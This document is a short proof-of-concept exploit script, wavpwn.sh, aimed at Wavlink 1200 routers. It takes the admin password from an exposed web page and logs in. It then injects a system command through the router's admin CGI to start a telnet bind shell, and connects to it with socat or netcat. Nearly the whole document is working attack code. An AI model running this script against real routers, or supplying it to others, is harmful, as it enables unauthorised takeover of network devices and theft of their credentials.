This is a PoC/exploit for the Wavlink 1200 Router. It scrapes the admin password and starts a bind shell on the router using telnet, then connects to it.

wavpwn.sh

# This is a quick POC to auto-pwn WavLink 1200 routers on the local network.
# Alternatives to live_test.shtml: 
#	sysinit.shtml
#	set_safety.shtml
#	wifi_region.shtml

HOST=$1
PORT=$2

if [ -z "$HOST" ]
then
	echo "Usage: ./wavpwn.sh host_ip shell_port(optional, default 7331)"
	exit
fi

if [ -z "$PORT" ]
then 
	PORT='7331'
fi

# Grab pass
PASS=$(curl -s http://$HOST/live_test.shtml | grep "var syspasswd=" | cut -d "\"" -f 2)
LHOST=$(curl -s http://$HOST/live_test.shtml | grep "var localIP=" | cut -d "\"" -f 2)

if [ -z "$PASS" ]
then
	echo "[-] Could not fetch password! Quitting."
	exit
else
	echo "[+] Captured password: $PASS"
	HASH=$(echo -n "$PASS" | md5sum)
fi

# Do the thing
echo "[+] Logging in..."
curl -s -X POST -d "page=login&username=admin&ipaddr=$LHOST&hostname=$HOST&password=$HASH" http://$HOST/cgi-bin/login.cgi > /dev/null

echo "[+] Setting bind shell on port $PORT..."
curl -s -X POST -d "page=sysCMD&command=%2Fbin%2Fbusybox+telnetd+-l%2Fbin%2Fsh+-p$PORT&SystemCommandSubmit=Apply" http://$HOST/cgi-bin/adm.cgi > /dev/null

echo "[+] Connecting to shell at $HOST:$PORT..."
if [ "$(which socat)" ]
then 
	socat FILE:`tty`,raw,echo=0 TCP:$HOST:$PORT
else
	echo "[ ] Socat not found, using netcat"
	nc $HOST $PORT
fi